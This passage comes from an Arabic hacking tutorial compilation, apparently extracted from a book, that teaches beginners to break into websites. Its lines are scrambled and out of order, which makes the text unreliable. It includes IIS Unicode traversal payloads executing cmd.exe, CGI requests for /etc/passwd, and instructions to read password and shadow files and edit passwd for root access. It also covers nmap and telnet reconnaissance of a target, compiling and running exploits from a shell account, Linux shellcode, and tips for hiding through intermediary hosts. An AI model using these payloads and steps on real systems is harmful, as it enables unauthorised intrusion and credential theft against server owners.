‫‪samples/..%255c..%255c..%255c..%255c..%255c../‬‬
‫‪\:%255cwinnt/system32/cmd.exe?/c+dir+c‬‬

‫‪235‬‬

adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c /
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
UONICODE ‫حاولت قد المستطاع انى أشكل فى أنواع‬
‫ هذه مثال عليها‬CGI ‫أما بالنسبة الى ثغرات الـ‬
cgi-bin/view-source?../../../../../../../etc/passwd /
cgi-bin/phf/
cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/
‫هذه وباقى العديد من الثغرات يعنى ل يقتصر المر على هذه الثغرات وراح أقسم الثغرات لك بحسب نظام‬
‫التشغيل‬
NT : Uni code , bofferoverfollow , tftp
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD,
,WU-FTPD, Kernel Exploits, rootkits
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
,exploits, rootkits, ProFTPD, WU-FTPD
،،،‫انتهى‬

236

‫"استغلل لينكس في اختراق المواقع "‬
‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬
‫>ةةةةةة‪<Black_sNiper :‬‬
‫هذا الموضوع مخصص لمن أراد التعامل مع لينكس في اختراق المواقع وليس لديه الخبرة الكافية فيه‪...‬‬
‫سوف يكون هذا الموضوع عن العمليات التي يستحسن القيام بها بعد الحصول على كلمة السر والنجاح في‬
‫الدخول على النظام‪..‬‬
‫أول يجب ان تعرف بأنه يمكن ان تدخل على بعض النظمة باستخدام بعض الكلمات المشهورة وتوجد بعض‬
‫النظمة تسمح لك بتنفيذ أمر واحد ثم تقوم باخراجك من النظام بعد ذلك وأفضل تلك الوامر هي ‪.:‬‬

‫‪who‬‬
‫‪rwho‬‬
‫‪finger‬‬

‫‪237‬‬

‫وتستفيد من هذه الوامر بأنك تستعرض اسماء المستخدمين للنظام وبذلك يمكن ان تستخرج كلمة السر من‬
‫نفس السم وذلك لن بعض المستخدمين يستعمل كلمة سر مشابهة تقريبا لسمه مثل ‪.:‬‬
‫‪username : Black‬‬
‫‪password : Black2‬‬
‫وفي بعض النظمة تستطيع الدخول بكتابة ‪ test‬أو ‪demo‬‬
‫من الملفات المهمة والتي يجب عليك استخراجها بعد دخولك على أي نظام ‪.:‬‬
‫‪etc/passwd/‬‬
‫‪etc/group/‬‬
‫‪etc/hosts/‬‬
‫‪usr/adm/sulog/‬‬
‫‪usr/adm/loginlog/‬‬
‫‪usr/adm/errlog/‬‬
‫‪usr/adm/culog/‬‬
‫‪usr/mail/‬‬
‫‪usr/lib/cron/crontabs /‬‬
‫‪etc/shadow/‬‬
‫الحساب ‪.: bin‬‬
‫وهو مهم حيث يحتوي على حساب المستخدم ويوجد به معظم الملفات المهمة وقد يوجد ملف كلمة السر واذا‬
‫كان كذلك فيمكن‬
‫)أحيانا( اضافة كلمة سر خاصة بك وتضيف حساب دخول )روت( لك !!‬
‫والطريقة بسهولة كالتالي ‪.:‬‬
‫‪$ ed passwd‬‬
‫وأخيرا تقول ‪ exec login‬وتكتب أي اسم وبذلك تكون انت مدير النظام!!‬
‫ما الذي سوف تواجهه عند دخولك على أي نظام بكلمة سر واسم مستخدم ؟!!‬
‫عند دخولك الى النظام ستقابل احدى هذه الحتمالت ‪.:‬‬
‫اما انك استطعت الحصول على حساب مدير النظام )الروت( أو انك حصلت على حساب مستخدم آخر‪..‬‬
‫في البداية تكتب المر التالي ‪.:‬‬
‫‪$ pwd‬‬
‫والنتيجة تظهر ‪.:‬‬
‫‪$ /usr/admin‬‬
‫النتيجة اظهرت انك استطعت الدخول على المدير وبذلك تستطيع التعامل مع كامل النظام بدون قيود‪..‬‬
‫اذا ظهرت نتيجة غير تلك النتيجة ‪ ..‬فمثل ‪:‬‬
‫‪$ /usr/Black‬‬
‫فهذا يدل على انك دخلت على حساب هذا المستخدم!!‬
‫ولعرض ملفات هذا المستخدم تكتب التي ‪.:‬‬
‫‪$ ls /usr/Black‬‬
‫وسوف يعرض لك ملفات هذا المستخدم ‪.:‬‬
‫‪mail‬‬
‫‪pers‬‬
‫‪games‬‬
‫‪bin‬‬
‫ولكن هذا لن يعرض ملف ‪profile.‬‬
‫ولكي تستعرضه تكتب التي ‪.:‬‬
‫‪$ cd‬‬

‫‪238‬‬

:‬‬ ‫‪$ cat letter‬‬ ‫وهذا اذا افترضنا ان الملف المطلوب هو ‪letter‬‬ ‫اذا اردت تغيير كلمة السر فما عليك ال ان تكتب ‪.‬‬ ‫للبحث عن معلومة معينة تكتب المر التالي ‪.:‬‬ ‫‪$ who‬‬ ‫‪safadM tty1 april 19 2:30‬‬ ‫‪paul tty2 april 19 2:19‬‬ ‫‪gopher tty3 april 19 2:31‬‬ ‫واذا اردت قراءة الملف المحتوي على كلمات السر المظللة يجب ان تكون قد دخلت على النظام باستخدام‬ ‫حساب المدير نفسه ‪ .:‬‬ ‫‪$ passwd‬‬ ‫ثم سيطلب منك كلمة السر القديمة وهي طبعا معك!! وتدخل كلمة السر الجديدة ‪.:‬‬ ‫‪$ cp letter letters‬‬ ‫اذا اردت عمل محادثة مع مستخدم آخر على اتصال فتكتب المر التالي ‪.root‬‬ ‫‪:bluebox::70‬‬ ‫‪239‬‬ ..43:34:3:Mr doooom:/usr/Black‬‬ ‫وهذا يعني انه يمكن للمستخدم الحتفاظ بكلمة السر لمدة ثلثة اسابيع بدون تغيير وانه يجب ان يغيرها كل‬ ‫ستة اسابيع ‪.:‬‬ ‫‪:Black:chips11.‫‪$ ls -a‬‬ ‫‪:‬‬ ‫‪:‬‬ ‫‪profile.‬‬ ‫استعراض ملف المجموعة كالتالي ‪.‬‬ ‫‪$‬‬ ‫اذا اردت قراءة محتويات ملف فسوف تكتب المر التالي ‪..:‬‬ ‫‪$ grep phone Black‬‬ ‫وهذا بافتراض انك طلبت ارقام الهاتف الخاصة بالمستخدم الخر‬ ‫ولعمل نسخ من ملف الى ملف آخر تكتب التي ‪.:‬‬ ‫‪$ write‬‬ ‫ولمعرفة من يوجد على النظام نكتب التي ‪.:‬‬ ‫‪$ ls /etc/group‬‬ ‫‪root::0:root‬‬ ‫‪adm::2:adm.:‬‬ ‫‪$ cat /etc/passwd‬‬ ‫‪:/:root:F943/sys34:0:1:0000‬‬ ‫‪sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh‬‬ ‫‪checkfsys:Locked.‬ولستعراض ملف كلمات السر نكتب ‪..:0:0:check file system:/usr/admin:/bin/rsh‬‬ ‫وقد يظهر حساب آخر للمدير كالتالي ‪.

.‬‬ ‫انتهى‪،،،‬‬ ‫" شرح مفصل من اللف إلى الياء في احتراف اختراق‬ ‫المواقع عن طريق لينكس "‬ ‫>منقول<‬ ‫>الكاتب‪ :‬ايسر <‬ ‫‪UNix Usage IN HackinG‬‬ ‫اهل بكم جميعا‬ ‫في البدايه احب ان انوه ان هناك العديد من الدروس الجميله فعل ‪ . root‬و هو يكون ‪. superuser‬‬ ‫و هو الدمين او المدير على النظام‪....‫ويمكن ان يحتوي ملف المجموعة على كلمات سر أو ليحتوي !!‬ ‫اذا كان ليحتوي على كلمة سر فانه يمكن ان تصبح انت مديرا للنظام في حالة دخولك بكلمة سر لمستخدم‬ ‫عادي وليس كمدير للنظام وذلك بعدة طرق ‪....‬بالضافه لليوزرز‬ ‫تسطيع ان تطلق على الرئيس هناك كلمه ‪ .‬‬ ‫‪240‬‬ .‬و لكنها قديمه و ليست ‪up to date‬‬ ‫لذلك اكتب لكم هذاالدرس المطول لكي يكون مكانا للمبتدئين يمكن ان يستفيدوا منه‬ ‫و اتمنى فعل ان يحوز على اعجابكم ‪(:‬‬ ‫بعض المصطلحات الهامه ‪:‬‬‫كثير من الناس يحبون ان يطلقوا على كل من ال ‪ pc . supercomputers‬و غيرها‬ ‫كلمه ‪BOX‬‬ ‫النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ‪.. servers .

‬يوجد منه العديد من التوزيعات و ان كان افضلها هي ‪ ) SuSe‬لم اجربها و لكن اسمع الكثير من‬ ‫الناس يشكرون في هذه التوزيعه (‬ ‫اما بالنسبه لسهل توزيه فهي ‪ MDK‬و قد و ضعت هنا بعض الدروس الخاصه بالمندريك‬ ‫يمكنك تحميلها و قرائتها ‪...‬‬ ‫اذن يجب ان تبحر الى النترنت من نظام اليونيكس ‪ .‬ما هي توزيعات اليونيكس ؟؟و اللينكس ؟؟‬ ‫بالنسبه لليونيكس ‪ .‬للينكس مميزات كثيره ‪.‬‬ ‫اوكي ‪ .‬ماذا ‪ ....‬تريد ان تخترق جهازك ام ماذا ؟؟‬ ‫اه‪.‬‬ ‫يوجد اللينكس ‪.‬يمكنك تطويره ليلئم امكانيات جهازك ‪.‬و نادر لما تلقي جهاز شغال على الويندوز ‪nt .......2‬ثمن السطوانات البلنك و النسخ فقط (‬ ‫على اي حال ‪ ..‬معظم اادوات و اكواد الكسبلويتات مصممه للعمل في بيئه اليونيكس ‪.‬حتلقي ان اللينكس لم يجد اي مودم موصل بالجهاز ؟؟‬ ‫ما هذا ‪ ...‬فهو منقسم الي قسمين ‪:‬‬ ‫‪ -1‬يونيكس تجاري ‪ ).‬‬ ‫بل يجب ان تلوم صانع كروت الفاكس الداخليه هذه ‪(:‬‬ ‫اوكي ‪....‬‬ ‫فكل المودمات الداخليه ‪ internal‬يطلقون عليها ‪...‬جميل جميل ‪ ..‬و من الفضل لك ال تستعملها ال اذا كنت ترغب في تركيب سيرفير‬ ‫على الجهاز‬ ‫‪.‬حاول تعرف المودم ‪ ..‬‬ ‫‪-2‬طبعا ‪ .‬لكن انت اليوم انسان مختلف‪ ...‬غير مجاني (‬ ‫‪ -2‬يونيكس مفتوح المصدر و مجاني ‪open source‬‬ ‫بالنسبه لليونيكس التجاري ل يمكن ان تركبه على جهازك العادي ‪...‬‬ ‫خلص ‪ .‬‬ ‫حسنا ‪ ...‬مجاني ‪ ....‬دعنا نبحر على النترنت ‪(:‬‬ ‫انا عارف انك حصلت على الدرس ده من النترنت ‪ .....‬‬ ‫‪9x‬‬ ‫اذن اقل حاجه حتى تخترق جهاز او سيرفير شغال على اليونيكس ‪.‬لذا فيمكنك تجاهله الن ‪(:‬‬ ‫اما المجاني فيوجد منه عده عائلت‬ ‫‪BSD‬‬‫و هي القدم و الصعب في الستعمال ‪ .‬‬ ‫لذا من الفضل انك تركبه في جهازك ‪.‬اذن ‪.. windows‬بل تحتاج الى اي نظام مشتق من نظام‬ ‫التشغيل اليونيكس ‪..‬انت انسان لينكسي ‪ .‬ل تتعجب ‪. winmodems‬‬ ‫لماذا لنها مصممه اساسا للعمل تحت نظام التشغيل ‪ ..‬ذه فلسفه محترمه ‪.‬‬ ‫ان لم تجد مكانا تحصل منه على اللينكس يمكنك مراسلتي على ايميلي و نحدد مكانا‬ ‫لتسليمك نسخه من الماندريك ‪ 9‬او الريد هات ‪ ) 7...‬تريد ان تخترق اجهزه مبحره في النترنت ‪.‬اما بالنسبه للمودم الخارجي ‪ external‬فهو مودم حقيقي ‪real or true modems‬‬ ‫‪ .. windows‬ارجوك ل تلوم اللينكس ‪.‬و لماذا ل يصلح الويندوز؟؟‬ ‫لسبيبن ‪:‬‬ ‫‪-1‬النترنت اغلبه اجهزه شغاله على اليونيكس سيستمز ‪.‬يجب ان تكون ملما بنظام التشغيل هذا‪.‬تريد ان تخترق ‪.‬ادخل على النترنت من خلل ال ‪ isp‬وذلك من خلل نظام الليونيكس ‪(:‬‬ ‫‪241‬‬ ......‬ل يمكنك ان تخترق باستخدام نظام التشغيل ‪ ....‬يوجد العديد من المودمز الخارجيه مثل ‪acorp .‬و هو طبعا غني عن التعريف‬ ‫طبعا ‪ .‬لكن هذا كان عن طريق الويندوز‬ ‫‪ ...‬السؤال هو لماذا هذه النظمه بالذات ‪ .s....‫بالنسبه لنظمه التشغيل ‪:‬‬ ‫طبعا ‪ .. robotics‬‬ ‫يجب ان تتاكد ان المودم يكون ‪ serial‬و ليس ‪USB‬‬ ‫على اي حال خلينا في موضوعنا‪.‬امن ‪ .... u..‬مستقر ‪ ..‬‬ ‫ النترنت‬‫‪ .‬لن اساسا يجب ان تعرف المودم بتاعك على اللينكس‬ ‫حسب التوزيعه اللي عندك ‪ .

.‬و يوجد العديد ممن يقدمون هذا الحدمه مجانا ‪.‬‬ ‫ثم بعد ذالك يقوم الموقع المطلوب بارسال كود الهتمل الخاص بالصفحه ‪index..‬ده ممكن يكون مثل جهاز مخترق من قبل او شيل اكاونت ‪.‬انت فهمتني غلط ‪ ....‬‬ ‫و هذا الخدمه ‪ service‬تكون مستضافه من خلل ديمون ‪daemon or server‬‬ ‫اذن ‪ .html‬‬ ‫‪242‬‬ ..‬ل ل ‪ ....‬ت‬ ‫‪ -2‬اياك ان تتباهى باختراقاتك ابدا اما غير المهتمين بامور الهاك ‪.‬‬ ‫‪REdirecting‬‬ ‫فحص المواقع ومنافذ ال ‪: TCP‬‬‫يجب عليك قبل ان تقوم بالختراق ان تعرف كيف يمشي النترنت ‪ ...‬ده كده كويس اوي‬ ‫طيب ايه الجهاز الوسيط ده‪ .‬‬ ‫طيب ماهو الشيل اكاونت‪ :‬هو عباره عن خدمه حيث يمكنك من خللها التحكم في جهاز من بعيد و هذا‬ ‫الجهاز عليه نظام اليونيكس‬ ‫طبعا من غير ان تقوم باختراق هذا الجهاز ‪.‬لكن‬ ‫جهازك======< جهاز وسيط======< السيرفير الضحيه ‪.‬او سيرفيرات اجب عليك قبل ان ‪ edu.‬ده مش مامون ‪.‬مش قصدي يعني تروح لنت‬ ‫كافيه ‪(:‬‬ ‫جهازك =====< الجهاز الضحيه ‪ .etc‬اختصار لكلمه ‪daemon‬‬ ‫مثال ‪ :‬لو سيادتك قمت بزياره هذا العنوان من خلل المتصفح مثل ‪ www.......‬هذه البورتات المفتوحه ) المفتوحه فقط ( تكون على استعدد دائما لتلقي الداتا من‬ ‫ريموت بوكس‬ ‫دائما ما ترتبط البورتات المفتوحه بما يسمى بخدمه ‪<< service.‬‬ ‫‪-3‬احاول ال تخترق دائم من خلل جهازك ‪ ..‬لكن طبعا هناك كثيير‬ ‫‪FTPd‬‬ ‫‪FTP‬‬ ‫‪21‬‬ ‫‪telnetd Telnet‬‬ ‫‪23‬‬ ‫‪(!sendmail (yes‬‬ ‫‪SMTP‬‬ ‫‪25‬‬ ‫‪apache‬‬ ‫‪HTTP‬‬ ‫‪80‬‬ ‫‪qpop‬‬ ‫‪POP3‬‬ ‫‪110‬‬ ‫حرف ‪ d‬في اخر كلمه ‪ ftp .1 /index..html‬واوامر اخرى كثيره ‪.‬‬ ‫و طبعا هنك و سائل عديده لذلك لن اتطرق اليها لن هناك العديد من الشروح المتميزه في مجال الحمايه‬ ‫وازاله الثر‬ ‫الخصهم في نقطتين او ثلثه ‪:‬‬ ‫‪-1‬ايك ان تحاول ان تسجل في موقع تحاول اختراقه ‪ ...‬الديمون هذا اذا قام صاحب الموقع بفتحه في السيرفير فانه يقوم بفتح منفذ في السيرفير ‪.‬‬ ‫طيب ‪ ..‬لكي يقوم‬ ‫الديمون هذا من خلله بتقديم الخدمه الملعونه =‪D‬‬ ‫و هذه بعض الخدمات مع البورتات الخاصه بهم ‪.host...‬‬ ‫‪ -4‬حاول ان ل تخترق اجهزه خطيره و مهمه مثل ‪ gov .mil.‬ركز معايا ابوس ايدك =‪D‬‬ ‫المفروض ان كل جهاز على النت بيكون فيه بورتات مفتوحه ‪..‬لعمل اخفاء لرقم تليفونك عن مزود الخدمه لديك ‪. telnet .....‬و‬ ‫غيرها من هذا النمط‪...‫اهم حاجه قبل الشروع في الختراق هي ان تحاول ال يتم اليقاع بك و كشف محاولتك لختراق سيريفير‬ ‫معين ‪.‬انه يعتمد على بروتوكول يدعى‬ ‫‪TCP\IP‬‬ ‫و بعض البروتوكولت الخرى ‪..‬‬ ‫‪ -5‬هذه النقطه تعتمد على بعض تقنيات الفريكينج ‪ .net‬ماالذي يحدث ؟؟‬ ‫يقوم المتصفح بالتصال بالموقع من خلل بورت ال ‪ TCP‬رقم ‪80‬‬ ‫ثم يقوم بارسال المر‬ ‫‪ GET /HTTP/1.‬هذا البورتات يمكنك ان تقوم من خللها‬ ‫بارسال الداتا‬ ‫من جهاز الى ذلك الجهاز ‪..‬و ل حتى باسامي مزوره لن هذا قد يجعلك عرضه‬ ‫لكشف الي بي الخاص بك‬ ‫و من ثم ال ‪ isp‬ثم رقم هاتفك و صباح الفل ‪.

.. port scaners‬السكانرز هي عباره عن برامج تحول ان تتصل بالسيرفير المستهدف‬ ‫من خلل جميع المنافذ ‪.. 2.insecure.xx‬‬ ‫‪.‬اذن كيف تحصل عى المعلومات هذه ‪.co.xx.'[^' Escape character is‬‬ ‫‪.edu‬‬ ‫‪..03$ rpm -i nmap-2..‬و ذلك لمعرفه اي البورتات المفتوحه‬ ‫في هذا السيرفير ‪.‬‬ ‫من خلل ما ال ‪ .‬ايه ده ‪. TCP‬تعال نشوف مثال ‪:‬‬ ‫‪bash-2.org/nmap‬‬ ‫‪:(Interesting ports on target.edu 21‬‬ ‫‪.edu‬كمثال لموقع‬ ‫مستهدف ‪.6) ready 220‬‬ ‫‪243‬‬ .Connected to target.lycos..03$ telnet target.‬اه ‪ ...‬و هوه ده اللي احنا محتاجينه‬ ‫=<‬ ‫اذن لكي تقوم باختراق موقع يجب ان تعرف اي ال ‪ daemons‬الموجوده عل السيرفير لذلك يجب عليك‬ ‫ان تعرف‬ ‫ماهي المنافذ المفتوحه في السيرفير المستهدف ‪.‬فكر معي ماهي هذه الداه؟؟؟‬ ‫نعم انها التلنت ‪ .‬و ان شاء ال سنحاول على مدار الدرس باستخدم الموقع ‪ target.‬يمكنك من خلله التصال باي موقع بمنفذ معين من خلل ال ‪...xx.rpm‬‬ ‫ثم نقوم بالتشغيل ‪ ..‬‬ ‫اتبع التالي ‪:‬‬ ‫‪bash-2.Trying xx.‬اشهر هذا السكانرز هي الداه ‪ nmap‬بواسطه ‪ fyodor‬و لحسن الحظ يوجد نسخه‬ ‫منها خاصه بالويندوز و ‪ !!.xx.‬و لكنه ايضا عباره عن‬ ‫برنامج بسيط ‪.‬من خلل التلنت ديمون ‪ ...53-1..i386.xx.xx‬‬ ‫)‪The 1518 ports scanned but not shown below are in state:‬‬ ‫‪(closed‬‬ ‫‪Port‬‬ ‫‪State‬‬ ‫‪Service‬‬ ‫‪tcp open‬‬ ‫‪ftp/21‬‬ ‫‪tcp open‬‬ ‫‪telnet/23‬‬ ‫‪tcp open‬‬ ‫‪smtp/25‬‬ ‫‪tcp open‬‬ ‫‪http/80‬‬ ‫‪tcp open‬‬ ‫‪pop3/110‬‬ ‫‪Nmap run completed -..target.edu (xx....edu‬‬ ‫لكن يلزمنا اداه معينه للتصال بالموقع من احد هذا المنافذ ‪.uk/linuxdude/e3sar‬‬ ‫طيب‪..edu FTP server (SunOS 5...edu‬‬ ‫‪Starting nmap V.‬صحيح ان التلنت هوه خدمه ‪.53 by fyodor@insecure..org‬‬ ‫‪( /( www.1 IP address (1 host up) scanned in 34‬‬ ‫‪seconds‬‬ ‫اذن لقد قام ال ‪ nmap‬بعمل فحص شامل على الموقع و قام بمعرفه المنافذ المفتوحه كم ترى!!‬ ‫اذن يمكننا ان نعرف ايضا اي الخدمات و ال ‪ daemons‬الموجوده في الموقع ‪target..‬؟؟‬ ‫احنا مش اتفقنا ننسى الويندوز ده خالص =>‬ ‫‪/http://members..‫الشيء الطريف ان ال ‪ daemons‬دي مليئه بالثغرات المنيه الخطيره ‪.03$ nmap -sS target.‬بالنسبه للينكس يمكننا ان نحصل على نسخه ‪ nmap‬على هيئه ‪rpm‬‬ ‫و لتركيبها اتبع التالي ‪:‬‬ ‫‪bash-2..

03$ nmap -sS target.Connected to target.edu 25 .0/8.122 .xx.9.org ( /( www. Sun.edu closing connection 2.0 221 .53 by fyodor@insecure..3 ‫طيب لماذا نحتج الى هذا المعلومات ؟؟ لن الكسبلويت و الثغره الموجوده دائما تعتمد على‬.edu (xx.xx The 1518 ports scanned but not shown below are in state:) (closed Port State Service tcp open ftp/21 tcp open telnet/23 tcp open smtp/25 tcp open http/80 tcp open pop3/110 TCP Sequence Prediction: Class=random positive increments (!Difficulty=937544 (Good luck Remote operating system guess: Linux 2. ‫جميل حميل‬ ‫لكن توجد مشكله وهي ان بعض المكعلومات قد يمكن ان‬.0/8.quit .1.3.. ‫ الموجود و على نظام التشغيل‬daemon ‫ال‬ ‫تكون مزوره او غير صحيحه‬ : ‫ازاي ؟؟؟تابع معايا كده‬ nmap ‫بالداه‬ bash-2..11.org/nmap :(Interesting ports on target.1 IP address (1 host up) scanned in 34 seconds 244 .edu Starting nmap V.Trying xx..03$ telnet target.edu ESMTP Sendmail 8. 2.Goodbye 221 Connection closed by foreign host ‫اهااااا‬ (: ‫دول دلونا على معلومات قيمه اوي اوي‬ SunOS 5.xx.xx .xx.0.2.6 ‫ نظام التشغيل هناك هو‬-1 sunOS ‫ اللي بييجي مع نظم السن‬standard ‫ ديمون الف تي بي هناك هو ال‬-2 : ‫تعال نجرب بورت تاني نتصل بيه من التلنت‬ bash-2.edu .9.Connection closed by foreign host ‫ و ان اصدار ه هو‬sendmail ‫ هو ال‬smtp ‫ايضا استفدنا معلومات قيمه هي ان ديمون‬ 8.insecure.11.14 Nmap run completed -.'[^' Escape character is target.xx. 24 Sep 2000 220 09:18:14 -0 (EDT) 400 quit target.2.

.03$ man nmap‬‬ ‫رفع ادواتك على شل اكونت ‪.User luser logged in 230‬‬ ‫‪ftp> put program.03$ vi exploit.‬لكن نقدر نقول ان المعلومات اللي جمعناها كفايه و‬ ‫ممكن تمشي‬ ‫طيب ‪.com‬‬ ‫‪.‬كده احنا قمن بعمل سكان على الموقع و لكن ممكن احد الدمينز لو عرف ان اننا قمنا بفحص‬ ‫موقعه ‪ ..‫يانهار اسود ‪|:‬‬ ‫نظام التشغيل اللي الده قامت بتخمينه هو لينكس !!!!!!‬ ‫مش كان ‪ !!!!!! sunOS‬اه يا و لد الكلب =@‬ ‫بس احنا برده لزم نعرف توزيعه اللينكس الوجوده ‪..42.6) ready 220‬‬ ‫‪Name: luser‬‬ ‫‪.‬بمجرد ان تعرف ماهو نظام التشغيل عند الموقع المستهدف و ايضا الديمونز‬ ‫الشغاله على السيرفير‬ ‫فيمكنك ان تذهب الى اي دتا بيز اللي بتقدم اكسبلويت ‪.‬و دي موجوده بكثره على النترنت‬ ‫‪245‬‬ .(ASCII data connection for program.03$ gcc program..PORT command successful 200‬‬ ‫‪.shell..‬‬ ‫)هذه الخطوه اذا كن عندك شيل اكاونت و مش عايز تخترق من جهازك (‬ ‫اتبع التالي ‪:‬‬ ‫‪bash-2.03$ ls‬‬ ‫‪program.‬‬ ‫وكومبايل للكسبلويت و بعدين اعملها رن على الهوست المستهدف‬ ‫‪sh-2.c‬‬ ‫ثم انسخ الكود ثم افتح تيرمينال تاني و اتصل بالشيل و الصق الكود في ملف و سميه بامتداد‪c.Transfer complete 226‬‬ ‫‪ftp> quit‬‬ ‫‪Goodbye 221‬‬ ‫طبعا هذه الطريقه ن خلل ا ‪ftp‬‬ ‫و هي غير محببه لنها تقوم بعمل ملفات اللوج لذلك يفضل لك ان تقوم بنسح سورس كود الكسبلويت و‬ ‫لصقها في ملف في الشيل ‪.c‬‬ ‫‪sh-2.03$ ftp shell..‬‬ ‫‪sh-2. usage‬‬ ‫ استغلل الثغرات المختلفه ‪-:‬‬‫هذا اهم جزا في الموضوع ‪.03$ .‬كل اكسبلود و له اوامره الخاصه في‬ ‫الكومبايل و له طريقه في التشغيل‬ ‫تظهر هذا الطريقه في التعليق البرمجي او في ال ‪.57982 150‬‬ ‫‪.Password required for luser 331‬‬ ‫‪:Password‬‬ ‫‪.c‬‬ ‫‪.com FTP server (SunOS 5.c -o program‬‬ ‫‪sh-2.com‬‬ ‫‪Connected to shell.253../program‬‬ ‫ملحوظه ‪ :‬عيب اوي انك تاخد المرين دول كقاعده مسلم بيها‪ .‬‬ ‫كده انت رفعت الكسبلويت بتاعتك للشيل اكاونت ‪.‬اعتقد نه حيكون زعلن منن و حنا مش عايزين الدمين يزعل مننا لذلك‬ ‫استخدمنا الختيار ‪ Ss-‬على اي حل فان عمل سكان لموقع يعتبر عمل شرعي ل مشاكل فيه =‪D‬‬ ‫لمزيد من المعلومات راجع‪:‬‬ ‫‪bash-2.18.c (204.

.xx.‬مش عارف ايه السند‬ ‫ميل اساسا ؟؟‬ ‫طيب رووح للدرس ده و نت تعرف ‪:‬‬ ‫‪http://www..‬اول حاجه شيل عادي ‪.‬و انما تستخدم جهازا وسيطا او شيل‬ ‫اكاونت ‪......‬‬ ‫زي ما قلت يجب عليك البا انك متستعملش جهازك في الختراق ‪ .html‬‬ ‫‪.securityfocus.Connected to yourshellaccount‬‬ ‫‪..‬ماهي الكسبلويت ؟؟‬ ‫الكسبلويت عباره عن سورس كود عاده مكتوب فبلغه السي او البيرل المهم ان‬ ‫الكسبلويت دي تقوم باستغلل منطقه معينه في السيرفير ‪..‬‬ ‫‪.insecure.‬ممكن تستعمل الرووت شيل ده كجهاز و سيط زي ما قلت في اول الدرس‬ ‫دتا بيز صغيره للكسبلويتات هي ‪www.‬طريقه لدخول الى الشيل اكاونت كالتالي‬ ‫‪bash-2..org/sploits.xx‬‬ ‫‪...0‬او اي ديمون اخر‬ ‫على فكره العيال ديما اسمعهم يقولوا ان السند ميل هو اكبر ديمون معرض للختراق ‪.‬مقسمه الى ديمونات و نظم تشغيل‬ ‫و لكن ‪..‬طبعا ممكن تلقي شيل كودس لجميع نظم التشغيل في مواقع‬ ‫السيكيورتي المختلفه‪.linux.‬لذلك يجب علينا ان نعرف نظم التشغيل المستخدم في السيرفير‬ ‫لو شوفنا كود اكسبلويت معينه ممكن نلقي ده‬ ‫‪= []char shellcode‬‬ ‫"\‪xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b‬‬ ‫"‬ ‫"\‬ ‫‪"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd‬‬ ‫"\‪.11.03$ telnet myshellaccount 23‬‬ ‫‪..‬في حاله ‪TARGET..pharaonics.xx.EDU‬‬ ‫يمكننا ان نستخدم الكسبلويت الخاصه ب ‪ sendmail 8.net/less/NEtworks/124..‬‬ ‫طبعا انت لو اخدت رووت شيل على السيرفير اذن فانت كده تمتلك كفه الصلحيات و ممكن تعمل كل اللي انت‬ ‫عايزه ‪..‬طيب زي ما قلت ان كل اكسبلويت مختلفه عن الخرى و يجب عليك ان تقرا الكود بتاعها او التعليقات اذا‬ ‫كنت ل تفهم في لغه البرمجه ‪...‬دهه للينكس و يقوم بتشغيل الشيل اللي في المسار دهه ‪bin/sh/‬‬ ‫طبعا لو السيرفير بتاعك شغال على نظام تشغيل اخر اذن يجب عليك ان تغير الشيل كود‬ ‫ده الى اخر يناسب النظام المستهدف ‪.co."x80\xe8\xdc\xff\xff\xff/bin/sh‬‬ ‫اها‪..‫‪http://www.za‬‬ ‫مثل ده فيه كل حاجه ممكن تتخيله ‪.‬‬ ‫تاني حاجه و ده المهم بالنسبه لنا مايسمى بالرووت شيل ‪..‬ان لما تشغل اكسبلويت على سيرفير معين ‪.cn/hack.Trying xx.htm‬‬ ‫فيه حاجه لزم تعرفها ‪..‬ايه الفوائد اللي جتعود عليك )غير طبعا‬ ‫اختراق الموقع (‬ ‫حتحصل على حاجتين اتنين ‪.‬يقوم هذه الكسبلويت بعمل ) دربكه في الديمون (‬ ‫مم يؤدي الى تشغيل الكود الذي تريده‬ ‫يقوم هذا الكود بتشغيل شيل في السيرفير لذلك فهو يسمى شيل كود ‪shell code‬‬ ‫طبعا يختلف هذا الكود تبعا لنظام التشغيل ‪ .'[^' Escape character is‬‬ ‫‪Welcome to yourshellaccount‬‬ ‫‪login: malicioususer‬‬ ‫‪(Password: (it doesn't display‬‬ ‫‪246‬‬ .com..com :‬‬ ‫‪www.‬‬ ‫من اسهل و اشهر الكسبلويتات هي البفر اوفر فلو ‪ ..

com etc‬‬ ‫او المواقع السيئه المحتوى كالباحيه او التي تسب الدين ‪ .‬على اي حل مش موضوعنا دهه‬ ‫طيب احنا دلوقتي عايزين نحتفظ بالموقع دهه ‪.‬يمكننا اول عمل الكومبايل و تشغيله كتاللي‪:‬‬ ‫‪sh-2.‬‬ ‫‪ -1‬ازاي تعمل ‪sushi‬؟؟؟؟‬ ‫‪247‬‬ .c -o exploit‬‬ ‫‪sh-2...‬‬ ‫طبعا الباك دورز في موضوعي ده تختلف تماما عن الكلم الفاضي ده و ل مؤاخذه‬ ‫طبعا الباك دورز دي عايزالها موضوع لواحده ان شاء احطه لكم قريبا ‪ .‬و الحل ؟؟‬ ‫بس احنا دلوقتي رووت و ممكن نعمل اللي في نفسنا ‪.03$ .... ibm..‬اذن فقد اخذنا رووت على السيستم ‪.<Last login: Fry Sep 15 11:45:34 from <yourIPaddress‬‬ ‫‪sh-2.‬لكن انا ساذكر لكم الساسيات‬ ‫فقط ‪.‬‬ ‫احسن باك دور هوه الهاك اتاك ‪../exploit target port‬‬ ‫‪sh-2.‬تذكر الثلث اجهزه اياهم‬ ‫جهازك‪ <-----‬جهاز وسيط‪ <------‬الجهاز المستهدف ‪...9.‬اه =| =|‬ ‫ايه الكلم ده 